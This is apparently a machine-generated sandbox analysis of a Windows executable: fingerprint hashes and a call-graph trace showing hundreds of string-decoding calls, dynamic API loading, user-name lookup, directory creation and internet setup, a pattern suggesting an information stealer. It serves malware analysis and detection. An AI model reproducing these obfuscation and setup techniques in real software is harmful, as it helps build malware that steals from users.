                                                                                          Similarity
                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                          • String ID:
                                                                                          • API String ID: 3168844106-0
                                                                                          • Opcode ID: 669a3202d5e4e5dc6d0ae2c224168df533380c29afc0a9decbf9f6bee936cfc0
                                                                                          • Instruction ID: 9793253dcae3c8a5e3ac2af54c5c795e73483527ae5333091cf20a0aa02f17f2
                                                                                          • Opcode Fuzzy Hash: 669a3202d5e4e5dc6d0ae2c224168df533380c29afc0a9decbf9f6bee936cfc0
                                                                                          • Instruction Fuzzy Hash: 34117C32908109EFDB00CFD9E880EEEF7BDFF95214B11419AE525A7610D730EA51CBA0

                                                                                          Execution Graph

                                                                                          Execution Coverage:7.7%
                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                          Signature Coverage:11.2%
                                                                                          Total number of Nodes:2000
                                                                                          Total number of Limit Nodes:28
                                                                                          execution_graph 52354 417250 52378 40254e 52354->52378 52362 417274 52476 40fa9c _EH_prolog lstrlenA 52362->52476 52365 40fa9c 4 API calls 52366 41729b 52365->52366 52367 40fa9c 4 API calls 52366->52367 52368 4172a2 52367->52368 52480 40f9e1 52368->52480 52370 4172ab 52371 4172ee OpenEventA 52370->52371 52372 4172d4 CloseHandle Sleep 52371->52372 52373 4172fb 52371->52373 52674 40fb4d 52372->52674 52375 417303 CreateEventA 52373->52375 52484 41695f _EH_prolog 52375->52484 52675 4024d7 memset 52378->52675 52380 402562 52381 4024d7 9 API calls 52380->52381 52382 402573 52381->52382 52383 4024d7 9 API calls 52382->52383 52384 402584 52383->52384 52385 4024d7 9 API calls 52384->52385 52386 402595 52385->52386 52387 4024d7 9 API calls 52386->52387 52388 4025a6 52387->52388 52389 4024d7 9 API calls 52388->52389 52390 4025b7 52389->52390 52391 4024d7 9 API calls 52390->52391 52392 4025c8 52391->52392 52393 4024d7 9 API calls 52392->52393 52394 4025d9 52393->52394 52395 4024d7 9 API calls 52394->52395 52396 4025ea 52395->52396 52397 4024d7 9 API calls 52396->52397 52398 4025fb 52397->52398 52399 4024d7 9 API calls 52398->52399 52400 40260c 52399->52400 52401 4024d7 9 API calls 52400->52401 52402 40261d 52401->52402 52403 4024d7 9 API calls 52402->52403 52404 40262e 52403->52404 52405 4024d7 9 API calls 52404->52405 52406 40263f 52405->52406 52407 4024d7 9 API calls 52406->52407 52408 402650 52407->52408 52409 4024d7 9 API calls 52408->52409 52410 402661 52409->52410 52411 4024d7 9 API calls 52410->52411 52412 402672 52411->52412 52413 4024d7 9 API calls 52412->52413 52414 402683 52413->52414 52415 4024d7 9 API calls 52414->52415 52416 402694 52415->52416 52417 4024d7 9 API calls 52416->52417 52418 4026a5 52417->52418 52419 4024d7 9 API calls 52418->52419 52420 4026b6 52419->52420 52421 4024d7 9 API calls 52420->52421 52422 4026c7 52421->52422 52423 4024d7 9 API calls 52422->52423 52424 4026d8 52423->52424 52425 4024d7 9 API calls 52424->52425 52426 4026e9 52425->52426 52427 4024d7 9 API calls 52426->52427 52428 4026fa 52427->52428 52429 4024d7 9 API calls 52428->52429 52430 40270b 52429->52430 52431 4024d7 9 API calls 52430->52431 52432 40271c 52431->52432 52433 4024d7 9 API calls 52432->52433 52434 40272d 52433->52434 52435 4024d7 9 API calls 52434->52435 52436 40273e 52435->52436 52437 4024d7 9 API calls 52436->52437 52438 40274f 52437->52438 52439 4024d7 9 API calls 52438->52439 52440 402760 52439->52440 52441 4024d7 9 API calls 52440->52441 52442 402771 52441->52442 52443 4024d7 9 API calls 52442->52443 52444 402782 52443->52444 52445 4024d7 9 API calls 52444->52445 52446 402793 52445->52446 52447 4024d7 9 API calls 52446->52447 52448 4027a4 52447->52448 52449 4024d7 9 API calls 52448->52449 52450 4027b5 52449->52450 52451 4024d7 9 API calls 52450->52451 52452 4027c6 52451->52452 52453 4024d7 9 API calls 52452->52453 52454 4027d7 52453->52454 52455 4024d7 9 API calls 52454->52455 52456 4027e8 52455->52456 52457 417330 LoadLibraryA 52456->52457 52458 41753a LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 52457->52458 52459 417348 52457->52459 52460 417598 GetProcAddress 52458->52460 52461 4175aa 52458->52461 52468 417369 20 API calls 52459->52468 52460->52461 52462 4175b3 GetProcAddress GetProcAddress 52461->52462 52463 4175dc 52461->52463 52462->52463 52464 4175e5 GetProcAddress 52463->52464 52465 4175f7 52463->52465 52464->52465 52466 417600 GetProcAddress 52465->52466 52467 417612 52465->52467 52466->52467 52469 417262 52467->52469 52470 41761b GetProcAddress GetProcAddress 52467->52470 52468->52458 52471 40f923 52469->52471 52470->52469 52472 40f931 52471->52472 52473 40f953 52472->52473 52474 40f949 lstrcpy 52472->52474 52475 40fbcb GetProcessHeap HeapAlloc GetUserNameA 52473->52475 52474->52473 52475->52362 52478 40fadc 52476->52478 52477 40fb01 52477->52365 52478->52477 52479 40faee lstrcpy lstrcat 52478->52479 52479->52477 52482 40f9f7 52480->52482 52481 40fa20 52481->52370 52482->52481 52483 40fa18 lstrcpy 52482->52483 52483->52481 52485 416973 52484->52485 52486 40f923 lstrcpy 52485->52486 52487 416986 52486->52487 52696 4134fd _EH_prolog 52487->52696 52489 416996 52698 4135ac _EH_prolog 52489->52698 52491 4169a5 52700 40f997 lstrlenA 52491->52700 52494 40f997 2 API calls 52495 4169c9 52494->52495 52704 4027ef 52495->52704 52501 416aba 52502 40f9e1 lstrcpy 52501->52502 52503 416acc 52502->52503 52504 40f923 lstrcpy 52503->52504 52505 416aeb 52504->52505 52506 40fa9c 4 API calls 52505->52506 52507 416b04 52506->52507 53294 40fa28 _EH_prolog 52507->53294 52510 40f9e1 lstrcpy 52511 416b2d 52510->52511 52512 416b54 CreateDirectoryA 52511->52512 53298 4010b1 _EH_prolog 52512->53298 52520 416b9d 52521 40f9e1 lstrcpy 52520->52521 52522 416baf 52521->52522 52523 40f9e1 lstrcpy 52522->52523 52524 416bc1 52523->52524 53421 40f95a 52524->53421 52527 40fa9c 4 API calls 52528 416be5 52527->52528 52529 40f9e1 lstrcpy 52528->52529 52530 416bf2 52529->52530 52531 40fa28 3 API calls 52530->52531 52532 416c11 52531->52532 52533 40f9e1 lstrcpy 52532->52533 52534 416c1e 52533->52534 52535 416c39 InternetOpenA 52534->52535 53425 40fb4d 52535->53425 52537 416c55 InternetOpenA 52538 40f95a lstrcpy 52537->52538 52539 416c85 52538->52539 52540 40f923 lstrcpy 52539->52540 52541 416c9c 52540->52541 53426 4104dd _EH_prolog GetWindowsDirectoryA 52541->53426 52544 40f95a lstrcpy 52545 416cc5 52544->52545 53445 403af5 _EH_prolog 52545->53445 52547 416ccf 53581 411cd8 _EH_prolog 52547->53581 52549 416cd7 52550 40f923 lstrcpy 52549->52550 52551 416d0b 52550->52551 52552 4010b1 2 API calls 52551->52552 52553 416d23 52552->52553 53601 40514c _EH_prolog 52553->53601 52555 416d2d 53780 411715 _EH_prolog 52555->53780 52557 416d35 52558 40f923 lstrcpy 52557->52558 52559 416d5d 52558->52559 52560 4010b1 2 API calls 52559->52560 52561 416d75 52560->52561 52562 40514c 46 API calls 52561->52562 52563 416d7f 52562->52563 53788 4114ee _EH_prolog 52563->53788 52565 416d87 52566 40f923 lstrcpy 52565->52566 52567 416daf 52566->52567 52568 4010b1 2 API calls 52567->52568 52569 416dc7 52568->52569 52570 40514c 46 API calls 52569->52570 52571 416dd1 52570->52571 53799 411649 _EH_prolog 52571->53799 52573 416dd9 52574 4010b1 2 API calls 52573->52574 52575 416ded 52574->52575 53808 414604 _EH_prolog 52575->53808 52578 40f95a lstrcpy 52579 416e06 52578->52579 52580 40f923 lstrcpy 52579->52580 52581 416e20 52580->52581 54150 4041b2 _EH_prolog 52581->54150 52583 416e29 52584 4010b1 2 API calls 52583->52584 52585 416e61 52584->52585 54169 40ed08 _EH_prolog 52585->54169 52674->52371 52680 40245c 52675->52680 52679 402536 memset 52679->52380 52692 4181c0 52680->52692 52685 410b12 52686 4024be CryptStringToBinaryA 52685->52686 52687 4024d0 strcat GetProcessHeap RtlAllocateHeap 52686->52687 52688 402308 52687->52688 52689 40231b 52688->52689 52690 40238b ??_U@YAPAXI 52689->52690 52691 4023a6 52690->52691 52691->52679 52693 402469 memset 52692->52693 52694 410b12 52693->52694 52695 40249e CryptStringToBinaryA 52694->52695 52695->52685 52697 413513 52696->52697 52697->52489 52699 4135c2 52698->52699 52699->52491 52701 40f9af 52700->52701 52702 40f9da 52701->52702 52703 40f9d0 lstrcpy 52701->52703 52702->52494 52703->52702 52705 4024d7 9 API calls 52704->52705 52706 4027f9 52705->52706 52707 4024d7 9 API calls 52706->52707 52708 40280a 52707->52708 52709 4024d7 9 API calls 52708->52709 52710 40281b 52709->52710 52711 4024d7 9 API calls 52710->52711 52712 40282c 52711->52712 52713 4024d7 9 API calls 52712->52713 52714 40283d 52713->52714 52715 4024d7 9 API calls 52714->52715 52716 40284e 52715->52716 52717 4024d7 9 API calls 52716->52717 52718 40285f 52717->52718 52719 4024d7 9 API calls 52718->52719 52720 402870 52719->52720 52721 4024d7 9 API calls 52720->52721 52722 402881 52721->52722 52723 4024d7 9 API calls 52722->52723 52724 402892 52723->52724 52725 4024d7 9 API calls 52724->52725 52726 4028a3 52725->52726 52727 4024d7 9 API calls 52726->52727 52728 4028b4 52727->52728 52729 4024d7 9 API calls 52728->52729 52730 4028c5 52729->52730 52731 4024d7 9 API calls 52730->52731 52732 4028d6 52731->52732 52733 4024d7 9 API calls 52732->52733 52734 4028e7 52733->52734 52735 4024d7 9 API calls 52734->52735 52736 4028f8 52735->52736 52737 4024d7 9 API calls 52736->52737 52738 402909 52737->52738 52739 4024d7 9 API calls 52738->52739 52740 40291a 52739->52740 52741 4024d7 9 API calls 52740->52741 52742 40292b 52741->52742 52743 4024d7 9 API calls 52742->52743 52744 40293c 52743->52744 52745 4024d7 9 API calls 52744->52745 52746 40294d 52745->52746 52747 4024d7 9 API calls 52746->52747 52748 40295e 52747->52748 52749 4024d7 9 API calls 52748->52749 52750 40296f 52749->52750 52751 4024d7 9 API calls 52750->52751 52752 402980 52751->52752 52753 4024d7 9 API calls 52752->52753 52754 402991 52753->52754 52755 4024d7 9 API calls 52754->52755 52756 4029a2 52755->52756 52757 4024d7 9 API calls 52756->52757 52758 4029b3 52757->52758 52759 4024d7 9 API calls 52758->52759 52760 4029c4 52759->52760 52761 4024d7 9 API calls 52760->52761 52762 4029d5 52761->52762 52763 4024d7 9 API calls 52762->52763 52764 4029e6 52763->52764 52765 4024d7 9 API calls 52764->52765 52766 4029f7 52765->52766 52767 4024d7 9 API calls 52766->52767 52768 402a08 52767->52768 52769 4024d7 9 API calls 52768->52769 52770 402a19 52769->52770 52771 4024d7 9 API calls 52770->52771 52772 402a2a 52771->52772 52773 4024d7 9 API calls 52772->52773 52774 402a3b 52773->52774 52775 4024d7 9 API calls 52774->52775 52776 402a4c 52775->52776 52777 4024d7 9 API calls 52776->52777 52778 402a5d 52777->52778 52779 4024d7 9 API calls 52778->52779 52780 402a6e 52779->52780 52781 4024d7 9 API calls 52780->52781 52782 402a7f 52781->52782 52783 4024d7 9 API calls 52782->52783 52784 402a90 52783->52784 52785 4024d7 9 API calls 52784->52785 52786 402aa1 52785->52786 52787 4024d7 9 API calls 52786->52787 52788 402ab2 52787->52788 52789 4024d7 9 API calls 52788->52789 52790 402ac3 52789->52790 52791 4024d7 9 API calls 52790->52791 52792 402ad4 52791->52792 52793 4024d7 9 API calls 52792->52793 52794 402ae5 52793->52794 52795 4024d7 9 API calls 52794->52795 52796 402af6 52795->52796 52797 4024d7 9 API calls 52796->52797 52798 402b07 52797->52798 52799 4024d7 9 API calls 52798->52799 52800 402b18 52799->52800 52801 4024d7 9 API calls 52800->52801 52802 402b29 52801->52802 52803 4024d7 9 API calls 52802->52803 52804 402b3a 52803->52804 52805 4024d7 9 API calls 52804->52805 52806 402b4b 52805->52806 52807 4024d7 9 API calls 52806->52807 52808 402b5c 52807->52808 52809 4024d7 9 API calls 52808->52809 52810 402b6d 52809->52810 52811 4024d7 9 API calls 52810->52811 52812 402b7e 52811->52812 52813 4024d7 9 API calls 52812->52813 52814 402b8f 52813->52814 52815 4024d7 9 API calls 52814->52815 52816 402ba0 52815->52816 52817 4024d7 9 API calls 52816->52817 52818 402bb1 52817->52818 52819 4024d7 9 API calls 52818->52819 52820 402bc2 52819->52820 52821 4024d7 9 API calls 52820->52821 52822 402bd3 52821->52822 52823 4024d7 9 API calls 52822->52823 52824 402be4 52823->52824 52825 4024d7 9 API calls 52824->52825 52826 402bf5 52825->52826 52827 4024d7 9 API calls 52826->52827 52828 402c06 52827->52828 52829 4024d7 9 API calls 52828->52829 52830 402c17 52829->52830 52831 4024d7 9 API calls 52830->52831 52832 402c28 52831->52832 52833 4024d7 9 API calls 52832->52833 52834 402c39 52833->52834 52835 4024d7 9 API calls 52834->52835 52836 402c4a 52835->52836 52837 4024d7 9 API calls 52836->52837 52838 402c5b 52837->52838 52839 4024d7 9 API calls 52838->52839 52840 402c6c 52839->52840 52841 4024d7 9 API calls 52840->52841 52842 402c7d 52841->52842 52843 4024d7 9 API calls 52842->52843 52844 402c8e 52843->52844 52845 4024d7 9 API calls 52844->52845 52846 402c9f 52845->52846 52847 4024d7 9 API calls 52846->52847 52848 402cb0 52847->52848 52849 4024d7 9 API calls 52848->52849 52850 402cc1 52849->52850 52851 4024d7 9 API calls 52850->52851 52852 402cd2 52851->52852 52853 4024d7 9 API calls 52852->52853 52854 402ce3 52853->52854 52855 4024d7 9 API calls 52854->52855 52856 402cf4 52855->52856 52857 4024d7 9 API calls 52856->52857 52858 402d05 52857->52858 52859 4024d7 9 API calls 52858->52859 52860 402d16 52859->52860 52861 4024d7 9 API calls 52860->52861 52862 402d27 52861->52862 52863 4024d7 9 API calls 52862->52863 52864 402d38 52863->52864 52865 4024d7 9 API calls 52864->52865 52866 402d49 52865->52866 52867 4024d7 9 API calls 52866->52867 52868 402d5a 52867->52868 52869 4024d7 9 API calls 52868->52869 52870 402d6b 52869->52870 52871 4024d7 9 API calls 52870->52871 52872 402d7c 52871->52872 52873 4024d7 9 API calls 52872->52873 52874 402d8d 52873->52874 52875 4024d7 9 API calls 52874->52875 52876 402d9e 52875->52876 52877 4024d7 9 API calls 52876->52877 52878 402daf 52877->52878 52879 4024d7 9 API calls 52878->52879 52880 402dc0 52879->52880 52881 4024d7 9 API calls 52880->52881 52882 402dd1 52881->52882 52883 4024d7 9 API calls 52882->52883 52884 402de2 52883->52884 52885 4024d7 9 API calls 52884->52885 52886 402df3 52885->52886 52887 4024d7 9 API calls 52886->52887 52888 402e04 52887->52888 52889 4024d7 9 API calls 52888->52889 52890 402e15 52889->52890 52891 4024d7 9 API calls 52890->52891 52892 402e26 52891->52892 52893 4024d7 9 API calls 52892->52893 52894 402e37 52893->52894 52895 4024d7 9 API calls 52894->52895 52896 402e48 52895->52896 52897 4024d7 9 API calls 52896->52897 52898 402e59 52897->52898 52899 4024d7 9 API calls 52898->52899 52900 402e6a 52899->52900 52901 4024d7 9 API calls 52900->52901 52902 402e7b 52901->52902 52903 4024d7 9 API calls 52902->52903 52904 402e8c 52903->52904 52905 4024d7 9 API calls 52904->52905 52906 402e9d 52905->52906 52907 4024d7 9 API calls 52906->52907 52908 402eae 52907->52908 52909 4024d7 9 API calls 52908->52909 52910 402ebf 52909->52910 52911 4024d7 9 API calls 52910->52911 52912 402ed0 52911->52912 52913 4024d7 9 API calls 52912->52913 52914 402ee1 52913->52914 52915 4024d7 9 API calls 52914->52915 52916 402ef2 52915->52916 52917 4024d7 9 API calls 52916->52917 52918 402f03 52917->52918 52919 4024d7 9 API calls 52918->52919 52920 402f14 52919->52920 52921 4024d7 9 API calls 52920->52921 52922 402f25 52921->52922 52923 4024d7 9 API calls 52922->52923 52924 402f36 52923->52924 52925 4024d7 9 API calls 52924->52925 52926 402f47 52925->52926 52927 4024d7 9 API calls 52926->52927 52928 402f58 52927->52928 52929 4024d7 9 API calls 52928->52929 52930 402f69 52929->52930 52931 4024d7 9 API calls 52930->52931 52932 402f7a 52931->52932 52933 4024d7 9 API calls 52932->52933 52934 402f8b 52933->52934 52935 4024d7 9 API calls 52934->52935 52936 402f9c 52935->52936 52937 4024d7 9 API calls 52936->52937 52938 402fad 52937->52938 52939 4024d7 9 API calls 52938->52939 52940 402fbe 52939->52940 52941 4024d7 9 API calls 52940->52941 52942 402fcf 52941->52942 52943 4024d7 9 API calls 52942->52943 52944 402fe0 52943->52944 52945 4024d7 9 API calls 52944->52945 52946 402ff1 52945->52946 52947 4024d7 9 API calls 52946->52947 52948 403002 52947->52948 52949 4024d7 9 API calls 52948->52949 52950 403013 52949->52950 52951 4024d7 9 API calls 52950->52951 52952 403024 52951->52952 52953 4024d7 9 API calls 52952->52953 52954 403035 52953->52954 52955 4024d7 9 API calls 52954->52955 52956 403046 52955->52956 52957 4024d7 9 API calls 52956->52957 52958 403057 52957->52958 52959 4024d7 9 API calls 52958->52959 52960 403068 52959->52960 52961 4024d7 9 API calls 52960->52961 52962 403079 52961->52962 52963 4024d7 9 API calls 52962->52963 52964 40308a 52963->52964 52965 4024d7 9 API calls 52964->52965 52966 40309b 52965->52966 52967 4024d7 9 API calls 52966->52967 52968 4030ac 52967->52968 52969 4024d7 9 API calls 52968->52969 52970 4030bd 52969->52970 52971 4024d7 9 API calls 52970->52971 52972 4030ce 52971->52972 52973 4024d7 9 API calls 52972->52973 52974 4030df 52973->52974 52975 4024d7 9 API calls 52974->52975 52976 4030f0 52975->52976 52977 4024d7 9 API calls 52976->52977 52978 403101 52977->52978 52979 4024d7 9 API calls 52978->52979 52980 403112 52979->52980 52981 4024d7 9 API calls 52980->52981 52982 403123 52981->52982 52983 4024d7 9 API calls 52982->52983 52984 403134 52983->52984 52985 4024d7 9 API calls 52984->52985 52986 403145 52985->52986 52987 4024d7 9 API calls 52986->52987 52988 403156 52987->52988 52989 4024d7 9 API calls 52988->52989 52990 403167 52989->52990 52991 4024d7 9 API calls 52990->52991 52992 403178 52991->52992 52993 4024d7 9 API calls 52992->52993 52994 403189 52993->52994 52995 4024d7 9 API calls 52994->52995 52996 40319a 52995->52996 52997 4024d7 9 API calls 52996->52997 52998 4031ab 52997->52998 52999 4024d7 9 API calls 52998->52999 53000 4031bc 52999->53000 53001 4024d7 9 API calls 53000->53001 53002 4031cd 53001->53002 53003 4024d7 9 API calls 53002->53003 53004 4031de 53003->53004 53005 4024d7 9 API calls 53004->53005 53006 4031ef 53005->53006 53007 4024d7 9 API calls 53006->53007 53008 403200 53007->53008 53009 4024d7 9 API calls 53008->53009 53010 403211 53009->53010 53011 4024d7 9 API calls 53010->53011 53012 403222 53011->53012 53013 4024d7 9 API calls 53012->53013 53014 403233 53013->53014 53015 4024d7 9 API calls 53014->53015 53016 403244 53015->53016 53017 4024d7 9 API calls 53016->53017 53018 403255 53017->53018 53019 4024d7 9 API calls 53018->53019 53020 403266 53019->53020 53021 4024d7 9 API calls 53020->53021 53022 403277 53021->53022 53023 4024d7 9 API calls 53022->53023 53024 403288 53023->53024 53025 4024d7 9 API calls 53024->53025 53026 403299 53025->53026 53027 4024d7 9 API calls 53026->53027 53028 4032aa 53027->53028 53029 4024d7 9 API calls 53028->53029 53030 4032bb 53029->53030 53031 4024d7 9 API calls 53030->53031 53032 4032cc 53031->53032 53033 4024d7 9 API calls 53032->53033 53034 4032dd 53033->53034 53035 4024d7 9 API calls 53034->53035 53036 4032ee 53035->53036 53037 4024d7 9 API calls 53036->53037 53038 4032ff 53037->53038 53039 4024d7 9 API calls 53038->53039 53040 403310 53039->53040 53041 4024d7 9 API calls 53040->53041 53042 403321 53041->53042 53043 4024d7 9 API calls 53042->53043 53044 403332 53043->53044 53045 4024d7 9 API calls 53044->53045 53046 403343 53045->53046 53047 4024d7 9 API calls 53046->53047 53048 403354 53047->53048 53049 4024d7 9 API calls 53048->53049 53050 403365 53049->53050 53051 4024d7 9 API calls 53050->53051 53052 403376 53051->53052 53053 4024d7 9 API calls 53052->53053 53054 403387 53053->53054 53055 4024d7 9 API calls 53054->53055 53056 403398 53055->53056 53057 4024d7 9 API calls 53056->53057 53058 4033a9 53057->53058 53059 4024d7 9 API calls 53058->53059 53060 4033ba 53059->53060 53061 4024d7 9 API calls 53060->53061 53062 4033cb 53061->53062 53063 4024d7 9 API calls 53062->53063 53064 4033dc 53063->53064 53065 4024d7 9 API calls 53064->53065 53066 4033ed 53065->53066 53067 4024d7 9 API calls 53066->53067 53068 4033fe 53067->53068 53069 4024d7 9 API calls 53068->53069 53070 40340f 53069->53070 53071 4024d7 9 API calls 53070->53071 53072 403420 53071->53072 53073 4024d7 9 API calls 53072->53073 53074 403431 53073->53074 53075 4024d7 9 API calls 53074->53075 53076 403442 53075->53076 53077 4024d7 9 API calls 53076->53077 53078 403453 53077->53078 53079 4024d7 9 API calls 53078->53079 53080 403464 53079->53080 53081 4024d7 9 API calls 53080->53081 53082 403475 53081->53082 53083 4024d7 9 API calls 53082->53083 53084 403486 53083->53084 53085 4024d7 9 API calls 53084->53085 53086 403497 53085->53086 53087 4024d7 9 API calls 53086->53087 53088 4034a8 53087->53088 53089 4024d7 9 API calls 53088->53089 53090 4034b9 53089->53090 53091 4024d7 9 API calls 53090->53091 53092 4034ca 53091->53092 53093 4024d7 9 API calls 53092->53093 53094 4034db 53093->53094 53095 4024d7 9 API calls 53094->53095 53096 4034ec 53095->53096 53097 4024d7 9 API calls 53096->53097 53098 4034fd 53097->53098 53099 4024d7 9 API calls 53098->53099 53100 40350e 53099->53100 53101 4024d7 9 API calls 53100->53101 53102 40351f 53101->53102 53103 4024d7 9 API calls 53102->53103 53104 403530 53103->53104 53105 4024d7 9 API calls 53104->53105 53106 403541 53105->53106 53107 4024d7 9 API calls 53106->53107 53108 403552 53107->53108 53109 4024d7 9 API calls 53108->53109 53110 403563 53109->53110 53111 4024d7 9 API calls 53110->53111 53112 403574 53111->53112 53113 4024d7 9 API calls 53112->53113 53114 403585 53113->53114 53115 4024d7 9 API calls 53114->53115 53116 403596 53115->53116 53117 4024d7 9 API calls 53116->53117 53118 4035a7 53117->53118 53119 4024d7 9 API calls 53118->53119 53120 4035b8 53119->53120 53121 4024d7 9 API calls 53120->53121 53122 4035c9 53121->53122 53123 4024d7 9 API calls 53122->53123 53124 4035da 53123->53124 53125 4024d7 9 API calls 53124->53125 53126 4035eb 53125->53126 53127 4024d7 9 API calls 53126->53127 53128 4035fc 53127->53128 53129 4024d7 9 API calls 53128->53129 53130 40360d 53129->53130 53131 4024d7 9 API calls 53130->53131 53132 40361e 53131->53132 53133 4024d7 9 API calls 53132->53133 53134 40362f 53133->53134 53135 4024d7 9 API calls 53134->53135 53136 403640 53135->53136 53137 4024d7 9 API calls 53136->53137 53138 403651 53137->53138 53139 4024d7 9 API calls 53138->53139 53140 403662 53139->53140 53141 4024d7 9 API calls 53140->53141 53142 403673 53141->53142 53143 4024d7 9 API calls 53142->53143 53144 403684 53143->53144 53145 4024d7 9 API calls 53144->53145 53146 403695 53145->53146 53147 4024d7 9 API calls 53146->53147 53148 4036a6 53147->53148 53149 4024d7 9 API calls 53148->53149 53150 4036b7 53149->53150 53151 4024d7 9 API calls 53150->53151 53152 4036c8 53151->53152 53153 4024d7 9 API calls 53152->53153 53154 4036d9 53153->53154 53155 4024d7 9 API calls 53154->53155 53156 4036ea 53155->53156 53157 4024d7 9 API calls 53156->53157 53158 4036fb 53157->53158 53159 4024d7 9 API calls 53158->53159 53160 40370c 53159->53160 53161 4024d7 9 API calls 53160->53161 53162 40371d 53161->53162 53163 4024d7 9 API calls 53162->53163 53164 40372e 53163->53164 53165 4024d7 9 API calls 53164->53165 53166 40373f 53165->53166 53167 4024d7 9 API calls 53166->53167 53168 403750 53167->53168 53169 4024d7 9 API calls 53168->53169 53170 403761 53169->53170 53171 4024d7 9 API calls 53170->53171 53172 403772 53171->53172 53173 4024d7 9 API calls 53172->53173 53174 403783 53173->53174 53175 4024d7 9 API calls 53174->53175 53176 403794 53175->53176 53177 4024d7 9 API calls 53176->53177 53178 4037a5 53177->53178 53179 4024d7 9 API calls 53178->53179 53180 4037b6 53179->53180 53181 4024d7 9 API calls 53180->53181 53182 4037c7 53181->53182 53183 4024d7 9 API calls 53182->53183 53184 4037d8 53183->53184 53185 4024d7 9 API calls 53184->53185 53186 4037e9 53185->53186 53187 4024d7 9 API calls 53186->53187 53188 4037fa 53187->53188 53189 4024d7 9 API calls 53188->53189 53190 40380b 53189->53190 53191 4024d7 9 API calls 53190->53191 53192 40381c 53191->53192 53193 4024d7 9 API calls 53192->53193 53194 40382d 53193->53194 53195 4024d7 9 API calls 53194->53195 53196 40383e 53195->53196 53197 4024d7 9 API calls 53196->53197 53198 40384f 53197->53198 53199 4024d7 9 API calls 53198->53199 53200 403860 53199->53200 53201 4024d7 9 API calls 53200->53201 53202 403871 53201->53202 53203 4024d7 9 API calls 53202->53203 53204 403882 53203->53204 53205 4024d7 9 API calls 53204->53205 53206 403893 53205->53206 53207 4024d7 9 API calls 53206->53207 53208 4038a4 53207->53208 53209 4024d7 9 API calls 53208->53209 53210 4038b5 53209->53210 53211 4024d7 9 API calls 53210->53211 53212 4038c6 53211->53212 53213 4024d7 9 API calls 53212->53213 53214 4038d7 53213->53214 53215 4024d7 9 API calls 53214->53215 53216 4038e8 53215->53216 53217 4024d7 9 API calls 53216->53217 53218 4038f9 53217->53218 53219 4024d7 9 API calls 53218->53219 53220 40390a 53219->53220 53221 4024d7 9 API calls 53220->53221 53222 40391b 53221->53222 53223 4024d7 9 API calls 53222->53223 53224 40392c 53223->53224 53225 4024d7 9 API calls 53224->53225 53226 40393d 53225->53226 53227 4024d7 9 API calls 53226->53227 53228 40394e 53227->53228 53229 4024d7 9 API calls 53228->53229 53230 40395f 53229->53230 53231 4024d7 9 API calls 53230->53231 53232 403970 53231->53232 53233 4024d7 9 API calls 53232->53233 53234 403981 53233->53234 53235 4024d7 9 API calls 53234->53235 53236 403992 53235->53236 53237 4024d7 9 API calls 53236->53237 53238 4039a3 53237->53238 53239 4024d7 9 API calls 53238->53239 53240 4039b4 53239->53240 53241 4024d7 9 API calls 53240->53241 53242 4039c5 53241->53242 53243 4024d7 9 API calls 53242->53243 53244 4039d6 53243->53244 53245 4024d7 9 API calls 53244->53245 53246 4039e7 53245->53246 53247 4024d7 9 API calls 53246->53247 53248 4039f8 53247->53248 53249 4024d7 9 API calls 53248->53249 53250 403a09 53249->53250 53251 4024d7 9 API calls 53250->53251 53252 403a1a 53251->53252 53253 4024d7 9 API calls 53252->53253 53254 403a2b 53253->53254 53255 4024d7 9 API calls 53254->53255 53256 403a3c 53255->53256 53257 4024d7 9 API calls 53256->53257 53258 403a4d 53257->53258 53259 417645 53258->53259 53260 417652 43 API calls 53259->53260 53261 417a2a 9 API calls 53259->53261 53260->53261 53262 417b39 53261->53262 53263 417acb GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 53261->53263 53264 417b46 8 API calls 53262->53264 53265 417bf9 53262->53265 53263->53262 53264->53265 53266 417c70 53265->53266 53267 417c02 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 53265->53267 53268 417d02 53266->53268 53269 417c7d 6 API calls 53266->53269 53267->53266 53270 417dd9 53268->53270 53271 417d0f 9 API calls 53268->53271 53269->53268 53272 417e50 53270->53272 53273 417de2 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 53270->53273 53271->53270 53274 417e82 53272->53274 53275 417e59 GetProcAddress GetProcAddress 53272->53275 53273->53272 53276 417eb4 53274->53276 53277 417e8b GetProcAddress GetProcAddress 53274->53277 53275->53274 53278 417ec1 10 API calls 53276->53278 53279 417fa0 53276->53279 53277->53276 53278->53279 53280 418000 53279->53280 53281 417fa9 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 53279->53281 53282 418009 GetProcAddress 53280->53282 53283 41801b 53280->53283 53281->53280 53282->53283 53284 418024 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 53283->53284 53285 41807b 53283->53285 53284->53285 53286 416aac 53285->53286 53287 418084 GetProcAddress 53285->53287 53288 410b5c _EH_prolog 53286->53288 53287->53286 53289 40f923 lstrcpy 53288->53289 53290 410b83 53289->53290 53291 40f923 lstrcpy 53290->53291 53292 410b9a GetSystemTime 53291->53292 53293 410bb8 53292->53293 53293->52501 53296 40fa65 53294->53296 53295 40fa89 53295->52510 53296->53295 53297 40fa77 lstrcpy lstrcat 53296->53297 53297->53295 53299 40f95a lstrcpy 53298->53299 53300 4010cc 53299->53300 53301 40f95a lstrcpy 53300->53301 53302 4010dc 53301->53302 53303 40f95a lstrcpy 53302->53303 53304 4010ec 53303->53304 53305 40f95a lstrcpy 53304->53305 53306 401108 53305->53306 53307 41390c _EH_prolog 53306->53307 53308 4135ac _EH_prolog 53307->53308 53309 413932 53308->53309 53310 40f997 2 API calls 53309->53310 53311 413946 53310->53311 53312 40f997 2 API calls 53311->53312 53313 413953 53312->53313 53314 40f997 2 API calls 53313->53314 53315 413960 53314->53315 53316 40f923 lstrcpy 53315->53316 53317 413970 53316->53317 53318 40f923 lstrcpy 53317->53318 53319 413981 53318->53319 53320 40f923 lstrcpy 53319->53320 53321 413992 53320->53321 53322 40f923 lstrcpy 53321->53322 53323 4139a3 53322->53323 53324 40f923 lstrcpy 53323->53324 53325 4139b4 53324->53325 53326 40f923 lstrcpy 53325->53326 53383 4139c5 53326->53383 53327 4020f9 lstrcpy 53327->53383 53329 40212d lstrcpy 53329->53383 53330 413adc StrCmpCA 53330->53383 53331 413b5d StrCmpCA 53332 41435b 53331->53332 53331->53383 53334 40f9e1 lstrcpy 53332->53334 53333 40f95a lstrcpy 53333->53383 53335 41436a 